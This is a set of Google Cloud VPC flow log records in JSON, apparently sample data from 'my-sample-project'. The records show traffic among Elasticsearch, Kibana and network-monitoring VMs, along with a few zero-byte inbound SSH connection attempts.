-{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"203.0.113.134","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"203.0.113.134","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"198.51.100.88","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"203.0.113.228","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"203.0.113.134","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"203.0.113.134","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"203.0.113.134","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"203.0.113.58","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 